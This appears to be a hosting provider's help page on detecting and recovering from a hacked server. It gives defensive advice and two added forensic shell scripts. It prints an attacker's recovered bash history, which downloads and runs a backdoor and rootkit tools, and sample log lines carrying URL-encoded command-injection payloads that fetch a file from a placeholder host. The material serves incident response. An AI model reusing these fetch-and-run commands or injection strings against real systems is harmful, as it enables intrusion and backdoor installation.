Hacked machine
It doesn't only happen to others.
How to tell that a machine has been hacked?
A look at the MRTG traffic graph leaves little doubt (the graph is not reproduced here):
And on the machine, we find:
root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]
root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
Clearly the attacker has been able to run programs as root. The machine is compromised and must be reinstalled.
# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823
Programs are running, and netstat reports their PID, yet ps does not show them. Almost certainly ps has been replaced by a trojaned ps that filters the attacker's processes out of its output to fool the eye.
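The cross-check described above as a small script, added here as an example (it is not part of the original page): it extracts the PIDs that netstat -p reports and the PIDs that ps lists and prints those present in the first set but missing from the second; on a live machine it also compares /proc against ps. The sample netstat and ps output embedded in it is constructed after the listings above, and the file names are made up.

```shell
#!/bin/sh
# Cross-check process visibility. A trojaned ps filters the attacker's
# processes out of its output, but the kernel still knows about them:
# netstat -p reports their PID and /proc has an entry for them. Any PID
# that shows up there but not in ps output is being hidden from you.
# The sample output in demo() and the file names are constructed for
# this example.

# pids_from_netstat: PID column of `netstat -tanpu` output read on stdin
# (last field looks like 28823/xc; it is "-" when netstat cannot tell).
pids_from_netstat() {
    awk '$NF ~ /^[0-9]+\// { split($NF, a, "/"); print a[1] }' | sort -un
}

# pids_from_ps: PID column of `ps auxw` output read on stdin (skips the header).
pids_from_ps() {
    awk 'NR > 1 && $2 ~ /^[0-9]+$/ { print $2 }' | sort -un
}

# hidden_pids NETSTAT_FILE PS_FILE: PIDs netstat reports but ps does not list.
hidden_pids() {
    seen=" $(pids_from_ps < "$2" | tr '\n' ' ') "
    for p in $(pids_from_netstat < "$1"); do
        case "$seen" in
            *" $p "*) ;;        # ps knows about it
            *) echo "$p" ;;     # hidden from ps
        esac
    done
}

# hidden_in_proc: live check on the running machine. Lists every /proc/<pid>
# that `ps auxw` does not report, with its command line. This only catches a
# userland rootkit (trojaned ps): a kernel (LKM) rootkit hides the /proc
# entries too, which is one more reason to reinstall rather than clean.
# A process that exits between the two snapshots shows up once; run it
# twice and keep what persists.
hidden_in_proc() {
    [ -d /proc ] || return 1
    psf=$(mktemp) || return 1
    ps auxw > "$psf"
    for d in /proc/[0-9]*; do
        p=${d#/proc/}
        if ! awk -v p="$p" '$2 == p { found = 1 } END { exit !found }' "$psf"; then
            printf '%s %s\n' "$p" "$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null)"
        fi
    done
    rm -f "$psf"
}

# demo: the symptom seen on the page, replayed on constructed sample output.
demo() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/netstat.txt" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 612/sshd
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
EOF
    cat > "$dir/ps.txt" <<'EOF'
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 612 0.0 0.5 1796 748 ? S 10:00 0:00 /usr/sbin/sshd
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823
EOF
    hidden_pids "$dir/netstat.txt" "$dir/ps.txt"   # prints 28823
    rm -rf "$dir"
}

demo
```

Run hidden_in_proc on the suspect box itself; it relies on the machine's own ps, so a PID it prints is one that ps is lying about, while an empty result proves nothing if the rootkit lives in the kernel.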
# halt
Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...
The system is going down for system halt NOW !!
We stop the machine immediately. Halting discards everything that only lived in memory (running processes, open connections), so if you intend to investigate, save the output of ps, netstat and the like before typing halt.
With luck the machine is only partially compromised: see SemiHackedMachine.
Another case: HackedMachineExample.
Why is the machine hacked?
The causes vary, but they come down to one thing: you are not paranoid enough.
You use telnet. Your login and password cross the Internet in the clear and can be captured at any time. Use SSH instead; here is a guide: SshOnDedicated.
You use FTP. Again your login and password cross the Internet in the clear, and it is the same password as root's. sftp is the solution.
You use POP3/IMAP with a plaintext password, and it is the root password. Use APOP or POP3S/IMAPS; here is a guide: SmtpPop3Imap.
You do not keep your server up to date with the releases (ReleasePatch), which makes you an easy target: about 250 scans a day hit our network looking for known vulnerabilities.
What to do?
Once the machine is hacked, only one effective solution remains: reinstall it.
The price is £90 + VAT and you start again from a freshly installed release on a new disk. If the chassis allows it, we fit the old disk as secondary and mount it on /mmt (for 10 days).
Hack examples
1. CGI script vulnerability
Symptoms
A g00dies.tgz archive uploaded to /tmp along with other files: x, k, etc.
The x program is a backdoor: once launched, it gives access to the server.
We found the .bash_history of the nobody user in /tmp; here is its content:
cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth
Comments
From it we can see that the commands were run as nobody, the user Apache runs as. The attacker most likely exploited a vulnerability in a CGI script.
Resolution
- Kill every suspect running process.
The attacker apparently did not get root (although a kernel flaw affecting versions before 2.4.24 could have let them), so we carry out some basic checks and cleanup:
- Change every password: root, users, MySQL, mail, etc. (the history shows the attacker ran a binary called mingetty unpacked from his own archive, so treat all credentials as captured).
- Look for files changed since the intrusion: find /rep -cmin -60 lists the files whose inode changed in the last hour (-cmin uses the change time, which, unlike the modification time, cannot be reset with touch; adjust the number of minutes to the time of the intrusion).
- Then read the Apache logs around the time of the intrusion to find the vulnerable script.
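The last three checks as one script, added here as an example and not the provider's own tooling: it lists files whose inode changed in the last N minutes, lists the executables and hidden entries the web server user left in /tmp, and pulls from an Apache access log the requests to cgi-bin that carry the strings the history above shows the attacker used (wget, /tmp, chmod, shell metacharacters, raw or URL-encoded), restricted to a time window. It assumes the web server runs as nobody and that the log is in Apache's common/combined format; the sample log lines and the host name in them are constructed.

```shell
#!/bin/sh
# Post-compromise triage for the CGI case: (1) recently changed files,
# (2) the attacker's footprint in /tmp, (3) the CGI requests that delivered
# the payload. Example script added to the page; sample log lines and the
# host name in them are constructed, "nobody" is the assumed Apache user.

# changed_since DIR MINUTES: files under DIR whose ctime is within MINUTES.
# -cmin (inode change time) rather than -mmin: an attacker can reset the
# modification time with `touch -r`, but not the change time.
changed_since() {
    find "$1" -xdev -type f -cmin "-$2" 2>/dev/null
}

# tmp_artefacts [USER]: executables and dot-named entries in /tmp owned by
# the web server user, i.e. what the history above left behind (x, k, ".,").
tmp_artefacts() {
    find /tmp -user "${1:-nobody}" \( -perm -u+x -o -name '.*' \) 2>/dev/null
}

# suspect_cgi_requests LOGFILE [START END]: access-log lines hitting cgi-bin
# that contain a tell-tale string, within an HH:MM window (same day).
# Matching is done on the lowercased line so %3B and %3b both count.
suspect_cgi_requests() {
    awk -v start="${2:-00:00}" -v end="${3:-23:59}" '
        {
            # %t field looks like [20/Nov/2003:11:27:05 +0100]; keep HH:MM
            t = $4; sub(/^\[[^:]*:/, "", t); hhmm = substr(t, 1, 5)
            if (hhmm < start || hhmm > end) next
            line = tolower($0)
        }
        line ~ /"[a-z]+ [^"]*cgi-bin[^"]*"/ &&
        line ~ /wget|\/tmp\/|chmod|%7c|%3b|%60|%26|[|;]/ { print }
    ' "$1"
}

# demo: run the log check over constructed sample lines (the 11:27 requests
# are the ones that fetch and launch the backdoor; the 12:40 one is outside
# the window).
demo() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
10.0.0.1 - - [20/Nov/2003:10:02:11 +0100] "GET /index.html HTTP/1.0" 200 2326
10.0.0.2 - - [20/Nov/2003:11:26:40 +0100] "GET /cgi-bin/search.cgi?q=linux HTTP/1.0" 200 512
10.0.0.3 - - [20/Nov/2003:11:27:05 +0100] "GET /cgi-bin/search.cgi?q=x%3Bcd%20/tmp%3Bwget%20www.example.com/x HTTP/1.0" 200 143
10.0.0.3 - - [20/Nov/2003:11:27:09 +0100] "GET /cgi-bin/search.cgi?q=x|chmod%20%2bx%20x HTTP/1.0" 200 143
10.0.0.4 - - [20/Nov/2003:12:40:00 +0100] "GET /cgi-bin/search.cgi?q=wget HTTP/1.0" 200 512
EOF
    suspect_cgi_requests "$f" 11:00 12:00
    rm -f "$f"
}

demo
```

On the real machine, take the timestamp of the first suspect request, use it to set the window for changed_since and to narrow the log search, and note the client address: it is what the attacker used, and it tells you which other logs to read.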